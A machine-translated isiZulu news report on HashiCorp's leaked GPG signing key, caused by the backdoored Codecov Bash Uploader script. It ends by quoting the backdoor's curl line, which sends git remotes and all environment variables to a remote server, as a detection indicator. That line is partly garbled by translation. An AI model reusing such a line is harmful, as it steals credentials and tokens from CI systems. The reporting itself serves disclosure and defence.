I-HashiCorp, eyaziwa ngokwakha amathuluzi omthombo ovulekile i-Vagrant, i-Packer, i-Nomad ne-Terraform, imemezele ukuvuza kokhiye oyimfihlo we-GPG osetshenziselwa ukudala amasiginesha edijithali aqinisekisa ukukhishwa. Abahlaseli abathole ukufinyelela kukhiye we-GPG bangase benze izinguquko ezifihliwe emikhiqizweni ye-HashiCorp ngokuyiqinisekisa ngesiginesha yedijithali elungile. Ngaso leso sikhathi, inkampani yathi ngesikhathi sokucwaninga, akukho mikhondo yemizamo yokwenza izinguquko ezinjalo ehlonziwe.
Okwamanje, ukhiye we-GPG owonakalisiwe uhoxisiwe futhi ukhiye omusha wethulwe endaweni yawo. Inkinga ithinte kuphela ukuqinisekiswa kusetshenziswa amafayela e-SHA256SUM kanye ne-SHA256SUM.sig, futhi ayizange ithinte ukukhiqizwa kwamasiginesha edijithali amaphakheji e-Linux DEB kanye ne-RPM ahlinzekwa nge-release.hashicorp.com, kanye nezindlela zokuqinisekisa zokukhishwa ze-macOS ne-Windows (AuthentiCode) .
Ukuvuza kwenzeke ngenxa yokusetshenziswa kweskripthi se-Codecov Bash Uploader (i-codecov-bash) nengqalasizinda, eklanyelwe ukulanda imibiko ehlanganisayo evela ezinhlelweni zokuhlanganisa eziqhubekayo. Ngesikhathi sokuhlaselwa kwenkampani yeCodecov, i-backdoor yafihlwa kuskripthi esishiwo, lapho amaphasiwedi nokhiye bokubethela bathunyelwa kuseva yabahlaseli.
Ukuze bagebe, abahlaseli basebenzise iphutha ngesikhathi bedala isithombe se-Codecov Docker, esibavumele ukuthi bakhiphe idatha yokufinyelela ku-GCS (Isitoreji Samafu se-Google), okudingekayo ukuze benze izinguquko kuskripthi se-Bash Uploader esatshalaliswa ku-codecov.io iwebhusayithi. Izinguquko zenziwa emuva ngoJanuwari 31, zahlala izinyanga ezimbili zingabonwa futhi zavumela abahlaseli ukuthi bakhiphe imininingwane egcinwe ezindaweni zesistimu yokuhlanganisa yamakhasimende eqhubekayo. Ngokusebenzisa ikhodi enonya eyengeziwe, abahlaseli bangathola ulwazi mayelana nenqolobane ye-Git ehloliwe nazo zonke izinto eziguquguqukayo zemvelo, okuhlanganisa amathokheni, okhiye bokubethela namaphasiwedi adluliselwa ezinhlelweni zokuhlanganisa eziqhubekayo ukuze bahlele ukufinyelela ikhodi yohlelo lokusebenza, amakhosombe kanye nezinsizakalo ezifana ne-Amazon Web Services kanye ne-GitHub.
Ngokungeziwe ocingweni oluqondile, umbhalo we-Codecov Bash Uploader wasetshenziswa njengengxenye yabanye abalayishi, njenge-Codecov-action (Github), i-Codecov-circleci-orb kanye ne-Codecov-bitrise-step, abasebenzisi bayo nabo abathintwa inkinga. Bonke abasebenzisi be-codecov-bash nemikhiqizo ehlobene bayanconywa ukuthi bahlole ingqalasizinda yabo, futhi bashintshe amagama ayimfihlo kanye nokhiye bokubethela. Ungahlola ukuba khona kwe-backdoor kusikripthi ngokuba khona komugqa curl -sm 0.5 -d β$(git remote -v)<<<<<< ENV $(env)β http:// /layisha/v2 || iqiniso
Source: opennet.ru